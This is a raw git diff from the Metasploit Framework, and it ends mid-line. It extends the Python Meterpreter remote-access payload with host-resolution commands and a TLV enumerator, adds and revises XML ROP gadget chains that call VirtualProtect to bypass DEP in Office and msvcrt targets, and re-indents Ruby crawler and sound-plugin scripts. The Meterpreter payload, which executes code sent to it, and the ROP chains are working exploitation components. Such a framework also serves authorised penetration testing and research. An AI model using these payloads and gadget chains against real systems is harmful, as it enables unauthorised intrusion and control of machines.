string += String.fromCharCode(chr1);
|
||||
input_idx++;
|
||||
}
|
||||
else if((chr1 > 191) && (chr1 < 224)) {
|
||||
chr2 = utftext.charCodeAt(input_idx+1);
|
||||
string += String.fromCharCode(((chr1 & 31) << 6) | (chr2 & 63));
|
||||
input_idx += 2;
|
||||
} else {
|
||||
chr2 = utftext.charCodeAt(input_idx+1);
|
||||
chr3 = utftext.charCodeAt(input_idx+2);
|
||||
string += String.fromCharCode(((chr1 & 15) << 12) | ((chr2 & 63) << 6) | (chr3 & 63));
|
||||
input_idx += 3;
|
||||
}
|
||||
}
|
||||
|
||||
return string;
|
||||
}
|
||||
|
||||
};
|
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
|
@ -149,6 +149,8 @@ TLV_TYPE_NETWORK_INTERFACE = TLV_META_TYPE_GROUP | 1433
|
|||
TLV_TYPE_SUBNET_STRING = TLV_META_TYPE_STRING | 1440
|
||||
TLV_TYPE_NETMASK_STRING = TLV_META_TYPE_STRING | 1441
|
||||
TLV_TYPE_GATEWAY_STRING = TLV_META_TYPE_STRING | 1442
|
||||
TLV_TYPE_ROUTE_METRIC = TLV_META_TYPE_UINT | 1443
|
||||
TLV_TYPE_ADDR_TYPE = TLV_META_TYPE_UINT | 1444
|
||||
|
||||
# Socket
|
||||
TLV_TYPE_PEER_HOST = TLV_META_TYPE_STRING | 1500
|
||||
|
@ -273,6 +275,9 @@ ERROR_FAILURE = 1
|
|||
# errors.
|
||||
ERROR_CONNECTION_ERROR = 10000
|
||||
|
||||
WIN_AF_INET = 2
|
||||
WIN_AF_INET6 = 23
|
||||
|
||||
def get_stat_buffer(path):
|
||||
si = os.stat(path)
|
||||
rdev = 0
|
||||
|
@ -290,6 +295,27 @@ def get_stat_buffer(path):
|
|||
st_buf += struct.pack('<II', blksize, blocks)
|
||||
return st_buf
|
||||
|
||||
def inet_pton(family, address):
|
||||
if hasattr(socket, 'inet_pton'):
|
||||
return socket.inet_pton(family, address)
|
||||
elif has_windll:
|
||||
WSAStringToAddress = ctypes.windll.ws2_32.WSAStringToAddressA
|
||||
lpAddress = (ctypes.c_ubyte * 28)()
|
||||
lpAddressLength = ctypes.c_int(ctypes.sizeof(lpAddress))
|
||||
if WSAStringToAddress(address, family, None, ctypes.byref(lpAddress), ctypes.byref(lpAddressLength)) != 0:
|
||||
raise Exception('WSAStringToAddress failed')
|
||||
if family == socket.AF_INET:
|
||||
return ''.join(map(chr, lpAddress[4:8]))
|
||||
elif family == socket.AF_INET6:
|
||||
return ''.join(map(chr, lpAddress[8:24]))
|
||||
raise Exception('no suitable inet_pton functionality is available')
|
||||
|
||||
def resolve_host(hostname, family):
|
||||
address_info = socket.getaddrinfo(hostname, 0, family, socket.SOCK_DGRAM, socket.IPPROTO_UDP)[0]
|
||||
family = address_info[0]
|
||||
address = address_info[4][0]
|
||||
return {'family':family, 'address':address, 'packed_address':inet_pton(family, address)}
|
||||
|
||||
def windll_GetNativeSystemInfo():
|
||||
if not has_windll:
|
||||
return None
|
||||
|
@ -687,6 +713,40 @@ def stdapi_fs_stat(request, response):
|
|||
response += tlv_pack(TLV_TYPE_STAT_BUF, st_buf)
|
||||
return ERROR_SUCCESS, response
|
||||
|
||||
@meterpreter.register_function
|
||||
def stdapi_net_resolve_host(request, response):
|
||||
hostname = packet_get_tlv(request, TLV_TYPE_HOST_NAME)['value']
|
||||
family = packet_get_tlv(request, TLV_TYPE_ADDR_TYPE)['value']
|
||||
if family == WIN_AF_INET:
|
||||
family = socket.AF_INET
|
||||
elif family == WIN_AF_INET6:
|
||||
family = socket.AF_INET6
|
||||
else:
|
||||
raise Exception('invalid family')
|
||||
result = resolve_host(hostname, family)
|
||||
response += tlv_pack(TLV_TYPE_IP, result['packed_address'])
|
||||
response += tlv_pack(TLV_TYPE_ADDR_TYPE, result['family'])
|
||||
return ERROR_SUCCESS, response
|
||||
|
||||
@meterpreter.register_function
|
||||
def stdapi_net_resolve_hosts(request, response):
|
||||
family = packet_get_tlv(request, TLV_TYPE_ADDR_TYPE)['value']
|
||||
if family == WIN_AF_INET:
|
||||
family = socket.AF_INET
|
||||
elif family == WIN_AF_INET6:
|
||||
family = socket.AF_INET6
|
||||
else:
|
||||
raise Exception('invalid family')
|
||||
for hostname in packet_enum_tlvs(request, TLV_TYPE_HOST_NAME):
|
||||
hostname = hostname['value']
|
||||
try:
|
||||
result = resolve_host(hostname, family)
|
||||
except socket.error:
|
||||
result = {'family':family, 'packed_address':''}
|
||||
response += tlv_pack(TLV_TYPE_IP, result['packed_address'])
|
||||
response += tlv_pack(TLV_TYPE_ADDR_TYPE, result['family'])
|
||||
return ERROR_SUCCESS, response
|
||||
|
||||
@meterpreter.register_function
|
||||
def stdapi_net_socket_tcp_shutdown(request, response):
|
||||
channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)
|
||||
|
@ -842,9 +902,12 @@ def stdapi_registry_query_value(request, response):
|
|||
if value_type.value == REG_SZ:
|
||||
response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data) + '\x00')
|
||||
elif value_type.value == REG_DWORD:
|
||||
response += tlv_pack(TLV_TYPE_VALUE_DATA, ''.join(value_data.value)[:4])
|
||||
value = value_data[:4]
|
||||
value.reverse()
|
||||
value = ''.join(map(chr, value))
|
||||
response += tlv_pack(TLV_TYPE_VALUE_DATA, value)
|
||||
else:
|
||||
response += tlv_pack(TLV_TYPE_VALUE_DATA, ''.join(value_data.value)[:value_data_sz.value])
|
||||
response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data, value_data_sz.value))
|
||||
return ERROR_SUCCESS, response
|
||||
return ERROR_FAILURE, response
|
||||
|
||||
|
|
Binary file not shown.
Binary file not shown.
|
@ -111,6 +111,24 @@ def packet_get_tlv(pkt, tlv_type):
|
|||
offset += tlv[0]
|
||||
return {}
|
||||
|
||||
def packet_enum_tlvs(pkt, tlv_type = None):
|
||||
offset = 0
|
||||
while (offset < len(pkt)):
|
||||
tlv = struct.unpack('>II', pkt[offset:offset+8])
|
||||
if (tlv_type == None) or ((tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type):
|
||||
val = pkt[offset+8:(offset+8+(tlv[0] - 8))]
|
||||
if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING:
|
||||
val = val.split('\x00', 1)[0]
|
||||
elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT:
|
||||
val = struct.unpack('>I', val)[0]
|
||||
elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL:
|
||||
val = bool(struct.unpack('b', val)[0])
|
||||
elif (tlv[1] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW:
|
||||
pass
|
||||
yield {'type':tlv[1], 'length':tlv[0], 'value':val}
|
||||
offset += tlv[0]
|
||||
raise StopIteration()
|
||||
|
||||
def tlv_pack(*args):
|
||||
if len(args) == 2:
|
||||
tlv = {'type':args[0], 'value':args[1]}
|
||||
|
@ -271,7 +289,7 @@ class PythonMeterpreter(object):
|
|||
if (data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED:
|
||||
return ERROR_FAILURE
|
||||
preloadlib_methods = self.extension_functions.keys()
|
||||
i = code.InteractiveInterpreter({'meterpreter':self, 'packet_get_tlv':packet_get_tlv, 'tlv_pack':tlv_pack, 'STDProcess':STDProcess})
|
||||
i = code.InteractiveInterpreter({'meterpreter':self, 'packet_enum_tlvs':packet_enum_tlvs, 'packet_get_tlv':packet_get_tlv, 'tlv_pack':tlv_pack, 'STDProcess':STDProcess})
|
||||
i.runcode(compile(data_tlv['value'], '', 'exec'))
|
||||
postloadlib_methods = self.extension_functions.keys()
|
||||
new_methods = filter(lambda x: x not in preloadlib_methods, postloadlib_methods)
|
||||
|
|
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
|
@ -18,29 +18,29 @@ require 'uri'
|
|||
|
||||
class CrawlerSimple < BaseParser
|
||||
|
||||
def parse(request,result)
|
||||
def parse(request,result)
|
||||
|
||||
if !result['Content-Type'].include? "text/html"
|
||||
return
|
||||
end
|
||||
if !result['Content-Type'].include? "text/html"
|
||||
return
|
||||
end
|
||||
|
||||
doc = Hpricot(result.body.to_s)
|
||||
doc.search('a').each do |link|
|
||||
doc = Hpricot(result.body.to_s)
|
||||
doc.search('a').each do |link|
|
||||
|
||||
hr = link.attributes['href']
|
||||
hr = link.attributes['href']
|
||||
|
||||
if hr and !hr.match(/^(\#|javascript\:)/)
|
||||
begin
|
||||
hreq = urltohash('GET',hr,request['uri'],nil)
|
||||
if hr and !hr.match(/^(\#|javascript\:)/)
|
||||
begin
|
||||
hreq = urltohash('GET',hr,request['uri'],nil)
|
||||
|
||||
insertnewpath(hreq)
|
||||
insertnewpath(hreq)
|
||||
|
||||
rescue URI::InvalidURIError
|
||||
#puts "Parse error"
|
||||
#puts "Error: #{link[0]}"
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
rescue URI::InvalidURIError
|
||||
#puts "Parse error"
|
||||
#puts "Error: #{link[0]}"
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
@ -18,60 +18,60 @@ require 'uri'
|
|||
|
||||
class CrawlerForms < BaseParser
|
||||
|
||||
def parse(request,result)
|
||||
def parse(request,result)
|
||||
|
||||
if !result['Content-Type'].include? "text/html"
|
||||
return
|
||||
end
|
||||
if !result['Content-Type'].include? "text/html"
|
||||
return
|
||||
end
|
||||
|
||||
hr = ''
|
||||
m = ''
|
||||
hr = ''
|
||||
m = ''
|
||||
|
||||
doc = Hpricot(result.body.to_s)
|
||||
doc.search('form').each do |f|
|
||||
hr = f.attributes['action']
|
||||
doc = Hpricot(result.body.to_s)
|
||||
doc.search('form').each do |f|
|
||||
hr = f.attributes['action']
|
||||
|
||||
fname = f.attributes['name']
|
||||
if fname.empty?
|
||||
fname = "NONE"
|
||||
end
|
||||
fname = f.attributes['name']
|
||||
if fname.empty?
|
||||
fname = "NONE"
|
||||
end
|
||||
|
||||
m = "GET"
|
||||
if !f.attributes['method'].empty?
|
||||
m = f.attributes['method'].upcase
|
||||
end
|
||||
m = "GET"
|
||||
if !f.attributes['method'].empty?
|
||||
m = f.attributes['method'].upcase
|
||||
end
|
||||
|
||||
#puts "Parsing form name: #{fname} (#{m})"
|
||||
#puts "Parsing form name: #{fname} (#{m})"
|
||||
|
||||
htmlform = Hpricot(f.inner_html)
|
||||
htmlform = Hpricot(f.inner_html)
|
||||
|
||||
arrdata = []
|
||||
arrdata = []
|
||||
|
||||
htmlform.search('input').each do |p|
|
||||
#puts p.attributes['name']
|
||||
#puts p.attributes['type']
|
||||
#puts p.attributes['value']
|
||||
htmlform.search('input').each do |p|
|
||||
#puts p.attributes['name']
|
||||
#puts p.attributes['type']
|
||||
#puts p.attributes['value']
|
||||
|
||||
#raw_request has uri_encoding disabled as it encodes '='.
|
||||
arrdata << (p.attributes['name'] + "=" + Rex::Text.uri_encode(p.attributes['value']))
|
||||
end
|
||||
#raw_request has uri_encoding disabled as it encodes '='.
|
||||
arrdata << (p.attributes['name'] + "=" + Rex::Text.uri_encode(p.attributes['value']))
|
||||
end
|
||||
|
||||
data = arrdata.join("&").to_s
|
||||
data = arrdata.join("&").to_s
|
||||
|
||||
|
||||
begin
|
||||
hreq = urltohash(m,hr,request['uri'],data)
|
||||
begin
|
||||
hreq = urltohash(m,hr,request['uri'],data)
|
||||
|
||||
hreq['ctype'] = 'application/x-www-form-urlencoded'
|
||||
hreq['ctype'] = 'application/x-www-form-urlencoded'
|
||||
|
||||
insertnewpath(hreq)
|
||||
insertnewpath(hreq)
|
||||
|
||||
|
||||
rescue URI::InvalidURIError
|
||||
#puts "Parse error"
|
||||
#puts "Error: #{link[0]}"
|
||||
end
|
||||
end
|
||||
end
|
||||
rescue URI::InvalidURIError
|
||||
#puts "Parse error"
|
||||
#puts "Error: #{link[0]}"
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
@ -14,28 +14,28 @@ require 'uri'
|
|||
|
||||
class CrawlerFrames < BaseParser
|
||||
|
||||
def parse(request,result)
|
||||
def parse(request,result)
|
||||
|
||||
if !result['Content-Type'].include? "text/html"
|
||||
return
|
||||
end
|
||||
if !result['Content-Type'].include? "text/html"
|
||||
return
|
||||
end
|
||||
|
||||
doc = Hpricot(result.body.to_s)
|
||||
doc.search('iframe').each do |ifra|
|
||||
doc = Hpricot(result.body.to_s)
|
||||
doc.search('iframe').each do |ifra|
|
||||
|
||||
ir = ifra.attributes['src']
|
||||
ir = ifra.attributes['src']
|
||||
|
||||
if ir and !ir.match(/^(\#|javascript\:)/)
|
||||
begin
|
||||
hreq = urltohash('GET',ir,request['uri'],nil)
|
||||
if ir and !ir.match(/^(\#|javascript\:)/)
|
||||
begin
|
||||
hreq = urltohash('GET',ir,request['uri'],nil)
|
||||
|
||||
insertnewpath(hreq)
|
||||
insertnewpath(hreq)
|
||||
|
||||
rescue URI::InvalidURIError
|
||||
#puts "Error"
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
rescue URI::InvalidURIError
|
||||
#puts "Error"
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
@ -15,29 +15,29 @@ require 'uri'
|
|||
|
||||
class CrawlerImage < BaseParser
|
||||
|
||||
def parse(request,result)
|
||||
def parse(request,result)
|
||||
|
||||
if !result['Content-Type'].include? "text/html"
|
||||
return
|
||||
end
|
||||
if !result['Content-Type'].include? "text/html"
|
||||
return
|
||||
end
|
||||
|
||||
doc = Hpricot(result.body.to_s)
|
||||
doc.search('img').each do |i|
|
||||
doc = Hpricot(result.body.to_s)
|
||||
doc.search('img').each do |i|
|
||||
|
||||
im = i.attributes['src']
|
||||
im = i.attributes['src']
|
||||
|
||||
if im and !im.match(/^(\#|javascript\:)/)
|
||||
begin
|
||||
hreq = urltohash('GET',im,request['uri'],nil)
|
||||
if im and !im.match(/^(\#|javascript\:)/)
|
||||
begin
|
||||
hreq = urltohash('GET',im,request['uri'],nil)
|
||||
|
||||
insertnewpath(hreq)
|
||||
insertnewpath(hreq)
|
||||
|
||||
rescue URI::InvalidURIError
|
||||
#puts "Parse error"
|
||||
#puts "Error: #{i[0]}"
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
rescue URI::InvalidURIError
|
||||
#puts "Parse error"
|
||||
#puts "Error: #{i[0]}"
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
@ -15,29 +15,29 @@ require 'uri'
|
|||
|
||||
class CrawlerLink < BaseParser
|
||||
|
||||
def parse(request,result)
|
||||
def parse(request,result)
|
||||
|
||||
if !result['Content-Type'].include? "text/html"
|
||||
return
|
||||
end
|
||||
if !result['Content-Type'].include? "text/html"
|
||||
return
|
||||
end
|
||||
|
||||
doc = Hpricot(result.body.to_s)
|
||||
doc.search('link').each do |link|
|
||||
doc = Hpricot(result.body.to_s)
|
||||
doc.search('link').each do |link|
|
||||
|
||||
hr = link.attributes['href']
|
||||
hr = link.attributes['href']
|
||||
|
||||
if hr and !hr.match(/^(\#|javascript\:)/)
|
||||
begin
|
||||
hreq = urltohash('GET',hr,request['uri'],nil)
|
||||
if hr and !hr.match(/^(\#|javascript\:)/)
|
||||
begin
|
||||
hreq = urltohash('GET',hr,request['uri'],nil)
|
||||
|
||||
insertnewpath(hreq)
|
||||
insertnewpath(hreq)
|
||||
|
||||
rescue URI::InvalidURIError
|
||||
#puts "Parse error"
|
||||
#puts "Error: #{link[0]}"
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
rescue URI::InvalidURIError
|
||||
#puts "Parse error"
|
||||
#puts "Error: #{link[0]}"
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
@ -18,31 +18,31 @@ require 'uri'
|
|||
|
||||
class CrawlerObjects < BaseParser
|
||||
|
||||
def parse(request,result)
|
||||
def parse(request,result)
|
||||
|
||||
if !result['Content-Type'].include? "text/html"
|
||||
return
|
||||
end
|
||||
if !result['Content-Type'].include? "text/html"
|
||||
return
|
||||
end
|
||||
|
||||
hr = ''
|
||||
m = ''
|
||||
hr = ''
|
||||
m = ''
|
||||
|
||||
doc = Hpricot(result.body.to_s)
|
||||
doc.search("//object/embed").each do |obj|
|
||||
doc = Hpricot(result.body.to_s)
|
||||
doc.search("//object/embed").each do |obj|
|
||||
|
||||
s = obj['src']
|
||||
s = obj['src']
|
||||
|
||||
begin
|
||||
hreq = urltohash('GET',s,request['uri'],nil)
|
||||
begin
|
||||
hreq = urltohash('GET',s,request['uri'],nil)
|
||||
|
||||
insertnewpath(hreq)
|
||||
insertnewpath(hreq)
|
||||
|
||||
|
||||
rescue URI::InvalidURIError
|
||||
#puts "Parse error"
|
||||
#puts "Error: #{link[0]}"
|
||||
end
|
||||
end
|
||||
end
|
||||
rescue URI::InvalidURIError
|
||||
#puts "Parse error"
|
||||
#puts "Error: #{link[0]}"
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
@ -18,31 +18,31 @@ require 'uri'
|
|||
|
||||
class CrawlerScripts < BaseParser
|
||||
|
||||
def parse(request,result)
|
||||
def parse(request,result)
|
||||
|
||||
if !result['Content-Type'].include? "text/html"
|
||||
return
|
||||
end
|
||||
if !result['Content-Type'].include? "text/html"
|
||||
return
|
||||
end
|
||||
|
||||
hr = ''
|
||||
m = ''
|
||||
hr = ''
|
||||
m = ''
|
||||
|
||||
doc = Hpricot(result.body.to_s)
|
||||
doc.search("//script").each do |obj|
|
||||
doc = Hpricot(result.body.to_s)
|
||||
doc.search("//script").each do |obj|
|
||||
|
||||
s = obj['src']
|
||||
s = obj['src']
|
||||
|
||||
begin
|
||||
hreq = urltohash('GET',s,request['uri'],nil)
|
||||
begin
|
||||
hreq = urltohash('GET',s,request['uri'],nil)
|
||||
|
||||
insertnewpath(hreq)
|
||||
insertnewpath(hreq)
|
||||
|
||||
|
||||
rescue URI::InvalidURIError
|
||||
#puts "Parse error"
|
||||
#puts "Error: #{link[0]}"
|
||||
end
|
||||
end
|
||||
end
|
||||
rescue URI::InvalidURIError
|
||||
#puts "Parse error"
|
||||
#puts "Error: #{link[0]}"
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
||||
|
||||
|
|
|
@ -0,0 +1,66 @@
|
|||
<?xml version="1.0" encoding="ISO-8859-1"?>
|
||||
<db>
|
||||
<rop>
|
||||
<compatibility>
|
||||
<target>2007</target>
|
||||
</compatibility>
|
||||
|
||||
<gadgets base="0x51bd0000">
|
||||
<gadget offset="0x000750fd">POP EAX # RETN</gadget>
|
||||
<gadget offset="0x00001158">ptr to VirtualProtect()</gadget>
|
||||
<gadget offset="0x0001803c">POP EBP # RETN</gadget>
|
||||
<gadget offset="0x0001803c">skip 4 bytes</gadget>
|
||||
<gadget offset="0x0001750f">POP EBX # RETN</gadget>
|
||||
<gadget value="safe_negate_size">Safe size to NEG</gadget>
|
||||
<gadget offset="0x00005737">XCHG EAX, EBX # RETN</gadget>
|
||||
<gadget offset="0x0004df88">NEG EAX # RETN</gadget>
|
||||
<gadget offset="0x00005737">XCHG EAX, EBX # RETN</gadget>
|
||||
<gadget offset="0x0002a7d8">POP EDX # RETN</gadget>
|
||||
<gadget value="ffffffc0">0x00000040</gadget>
|
||||
<gadget offset="0x00038b65">XCHG EAX, EDX # RETN</gadget>
|
||||
<gadget offset="0x0004df88">NEG EAX # RETN</gadget>
|
||||
<gadget offset="0x00038b65">XCHG EAX, EDX # RETN</gadget>
|
||||
<gadget offset="0x000406e9">POP ECX # RETN</gadget>
|
||||
<gadget offset="0x0008bfae">Writable location</gadget>
|
||||
<gadget offset="0x0003cc24">POP EDI # RETN</gadget>
|
||||
<gadget offset="0x0004df8a">RETN (ROP NOP)</gadget>
|
||||
<gadget offset="0x0002d94b">POP ESI # RETN</gadget>
|
||||
<gadget offset="0x0002c840">JMP [EAX]</gadget>
|
||||
<gadget offset="0x0003a4ec">PUSHAD # RETN</gadget>
|
||||
<gadget offset="0x0007a9f3">ptr to 'jmp esp'</gadget>
|
||||
</gadgets>
|
||||
</rop>
|
||||
|
||||
<rop>
|
||||
<compatibility>
|
||||
<target>2010</target>
|
||||
</compatibility>
|
||||
|
||||
<gadgets base="0x51bd0000">
|
||||
<gadget offset="0x0003e4fa">POP EBP # RETN</gadget>
|
||||
<gadget offset="0x0003e4fa">skip 4 bytes</gadget>
|
||||
<gadget offset="0x0006a2b4">POP EBX # RETN</gadget>
|
||||
<gadget value="safe_negate_size">Safe size to NEG</gadget>
|
||||
<gadget offset="0x00069351">XCHG EAX, EBX # RETN</gadget>
|
||||
<gadget offset="0x00025188">NEG EAX # POP ESI # RETN</gadget>
|
||||
<gadget value="junk">JUNK</gadget>
|
||||
<gadget offset="0x00069351">XCHG EAX, EBX # RETN</gadget>
|
||||
<gadget offset="0x0002a429">POP EDX # RETN</gadget>
|
||||
<gadget value="ffffffc0">0x00000040</gadget>
|
||||
<gadget offset="0x0001a84d">XCHG EAX, EDX # RETN</gadget>
|
||||
<gadget offset="0x00025188">NEG EAX # POP ESI # RETN</gadget>
|
||||
<gadget value="junk">JUNK</gadget>
|
||||
<gadget offset="0x0001a84d">XCHG EAX, EDX # RETN</gadget>
|
||||
<gadget offset="0x0006c4b1">POP ECX # RETN</gadget>
|
||||
<gadget offset="0x0008c638">Writable location</gadget>
|
||||
<gadget offset="0x0000be1d">POP EDI # RETN</gadget>
|
||||
<gadget offset="0x00005383">RETN (ROP NOP)</gadget>
|
||||
<gadget offset="0x00073335">POP ESI # RETN</gadget>
|
||||
<gadget offset="0x0002c7cb">JMP [EAX]</gadget>
|
||||
<gadget offset="0x00076452">POP EAX # RETN</gadget>
|
||||
<gadget offset="0x000010b8">ptr to VirtualProtect()</gadget>
|
||||
<gadget offset="0x0006604e">PUSHAD # RETN</gadget>
|
||||
<gadget offset="0x00014534">ptr to 'jmp esp'</gadget>
|
||||
</gadgets>
|
||||
</rop>
|
||||
</db>
|
|
@ -9,7 +9,7 @@
|
|||
<gadget offset="0x00024c66">POP EBP # RETN</gadget>
|
||||
<gadget offset="0x00024c66">skip 4 bytes</gadget>
|
||||
<gadget offset="0x00004edc">POP EAX # RETN</gadget>
|
||||
<gadget value="FFFFFBFF">0x00000201</gadget>
|
||||
<gadget value="safe_negate_size">0x00000201</gadget>
|
||||
<gadget offset="0x00011e05">NEG EAX # RETN</gadget>
|
||||
<gadget offset="0x000136e3">POP EBX # RETN</gadget>
|
||||
<gadget value="0xffffffff"></gadget>
|
||||
|
|
|
@ -7,12 +7,21 @@
|
|||
</compatibility>
|
||||
|
||||
<gadgets base="0x77c10000">
|
||||
<gadget offset="0x0002b860">POP EAX # RETN</gadget>
|
||||
<gadget value="safe_negate_size">0xFFFFFBFF -> ebx</gadget>
|
||||
<gadget offset="0x0000be18">NEG EAX # POP EBP # RETN</gadget>
|
||||
<gadget value="junk">JUNK</gadget>
|
||||
<gadget offset="0x0001362c">POP EBX # RETN</gadget>
|
||||
<gadget offset="0x0004d9bb">Writable location</gadget>
|
||||
<gadget offset="0x0001e071">XCHG EAX, EBX # ADD BYTE [EAX], AL # RETN</gadget>
|
||||
<gadget offset="0x00040d13">POP EDX # RETN</gadget>
|
||||
<gadget value="0xFFFFFFC0">0xFFFFFFC0-> edx</gadget>
|
||||
<gadget offset="0x00048fbc">XCHG EAX, EDX # RETN</gadget>
|
||||
<gadget offset="0x0000be18">NEG EAX # POP EBX # RETN</gadget>
|
||||
<gadget value="junk">JUNK</gadget>
|
||||
<gadget offset="0x00048fbc">XCHG EAX, EDX # RETN</gadget>
|
||||
<gadget offset="0x0002ee15">POP EBP # RETN</gadget>
|
||||
<gadget offset="0x0002ee15">skip 4 bytes</gadget>
|
||||
<gadget offset="0x0003fa1c">POP EBX # RETN</gadget>
|
||||
<gadget value="0x00000400">0x00000400-> ebx</gadget>
|
||||
<gadget offset="0x00040d13">POP EDX # RETN</gadget>
|
||||
<gadget value="0x00000040">0x00000040-> edx</gadget>
|
||||
<gadget offset="0x0002eeef">POP ECX # RETN</gadget>
|
||||
<gadget offset="0x0004d9bb">Writable location</gadget>
|
||||
<gadget offset="0x0001a88c">POP EDI # RETN</gadget>
|
||||
|
@ -33,23 +42,29 @@
|
|||
</compatibility>
|
||||
|
||||
<gadgets base="0x77ba0000">
|
||||
<gadget offset="0x0003eebf">POP EAX # RETN</gadget>
|
||||
<gadget offset="0x00001114">ptr to VirtualProtect()</gadget>
|
||||
<gadget offset="0x00012563">POP EAX # RETN</gadget>
|
||||
<gadget offset="0x00001114">VirtualProtect()</gadget>
|
||||
<gadget offset="0x0001f244">MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN</gadget>
|
||||
<gadget value="junk">Filler</gadget>
|
||||
<gadget value="junk">JUNK</gadget>
|
||||
<gadget offset="0x00010c86">XCHG EAX,ESI # RETN</gadget>
|
||||
<gadget offset="0x00026320">POP EBP # RETN</gadget>
|
||||
<gadget offset="0x00042265">PUSH ESP # RETN</gadget>
|
||||
<gadget offset="0x000385b7">POP EBX # RETN</gadget>
|
||||
<gadget value="0x00000400">0x00000400-> ebx</gadget>
|
||||
<gadget offset="0x0003e4fc">POP EDX # RETN</gadget>
|
||||
<gadget value="0x00000040">0x00000040-> edx</gadget>
|
||||
<gadget offset="0x000330fb">POP ECX # RETN</gadget>
|
||||
<gadget offset="0x0004ff56">Writable location</gadget>
|
||||
<gadget offset="0x00038a92">POP EDI # RETN</gadget>
|
||||
<gadget offset="0x00037d82">RETN (ROP NOP)</gadget>
|
||||
<gadget offset="0x0003eebf">POP EAX # RETN</gadget>
|
||||
<gadget value="nop">nop</gadget>
|
||||
<gadget offset="0x00029801">POP EBP # RETN</gadget>
|
||||
<gadget offset="0x00042265">ptr to 'push esp # ret'</gadget>
|
||||
<gadget offset="0x00012563">POP EAX # RETN</gadget>
|
||||
<gadget value="0x03C0990F">EAX</gadget>
|
||||
<gadget offset="0x0003d441">SUB EAX, 03c0940f (dwSize, 0x500 -> ebx)</gadget>
|
||||
<gadget offset="0x000148d3">POP EBX, RET</gadget>
|
||||
<gadget offset="0x000521e0">.data</gadget>
|
||||
<gadget offset="0x0001f102">XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN</gadget>
|
||||
<gadget offset="0x0001fc02">POP ECX # RETN</gadget>
|
||||
<gadget offset="0x0004f001">W pointer (lpOldProtect) (-> ecx)</gadget>
|
||||
<gadget offset="0x00038c04">POP EDI # RETN</gadget>
|
||||
<gadget offset="0x00038c05">ROP NOP (-> edi)</gadget>
|
||||
<gadget offset="0x00012563">POP EAX # RETN</gadget>
|
||||
<gadget value="0x03C0944F">EAX</gadget>
|
||||
<gadget offset="0x0003d441">SUB EAX, 03c0940f</gadget>
|
||||
<gadget offset="0x00018285">XCHG EAX,EDX # RETN</gadget>
|
||||
<gadget offset="0x00012563">POP EAX # RETN</gadget>
|
||||
<gadget value="nop">NOP</gadget>
|
||||
<gadget offset="0x00046591">PUSHAD # ADD AL,0EF # RETN</gadget>
|
||||
</gadgets>
|
||||
</rop>
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
#!/usr/bin/env ruby
|
||||
|
||||
Dir.open(".").entries.grep(/.aiff$/).each do |inp|
|
||||
out = inp.gsub(".aiff", ".wav")
|
||||
system("sox #{inp} #{out}")
|
||||
out = inp.gsub(".aiff", ".wav")
|
||||
system("sox #{inp} #{out}")
|
||||
end
|
||||
|
||||
|
|
|
@ -1,34 +1,34 @@
|
|||
sounds = {
|
||||
'num0' => '0',
|
||||
'num1' => '1',
|
||||
'num2' => '2',
|
||||
'num3' => '3',
|
||||
'num4' => '4',
|
||||
'num5' => '5',
|
||||
'num6' => '6',
|
||||
'num7' => '7',
|
||||
'num8' => '8',
|
||||
'num9' => '9',
|
||||
'closed' => 'closed',
|
||||
'opened' => 'opened',
|
||||
'plugin_load' => 'meta sploit sound plugin has been loaded',
|
||||
'plugin_unload' => 'sound plugin has been unloaded',
|
||||
'session' => 'session',
|
||||
'address' => 'address',
|
||||
'port' => 'port',
|
||||
'dot' => 'dot',
|
||||
'session_open_meterpreter' => 'a new meterp reter session has been opened',
|
||||
'session_open_shell' => 'a new command shell session has been opened',
|
||||
'session_open_vnc' => 'a new VNC session has been opened'
|
||||
'num0' => '0',
|
||||
'num1' => '1',
|
||||
'num2' => '2',
|
||||
'num3' => '3',
|
||||
'num4' => '4',
|
||||
'num5' => '5',
|
||||
'num6' => '6',
|
||||
'num7' => '7',
|
||||
'num8' => '8',
|
||||
'num9' => '9',
|
||||
'closed' => 'closed',
|
||||
'opened' => 'opened',
|
||||
'plugin_load' => 'meta sploit sound plugin has been loaded',
|
||||
'plugin_unload' => 'sound plugin has been unloaded',
|
||||
'session' => 'session',
|
||||
'address' => 'address',
|
||||
'port' => 'port',
|
||||
'dot' => 'dot',
|
||||
'session_open_meterpreter' => 'a new meterp reter session has been opened',
|
||||
'session_open_shell' => 'a new command shell session has been opened',
|
||||
'session_open_vnc' => 'a new VNC session has been opened'
|
||||
}
|
||||
|
||||
voice_name = 'Zarvox'
|
||||
|
||||
def create_aiff(voice, file,text)
|
||||
system("say -v #{voice} -o #{file}.aiff #{text}")
|
||||
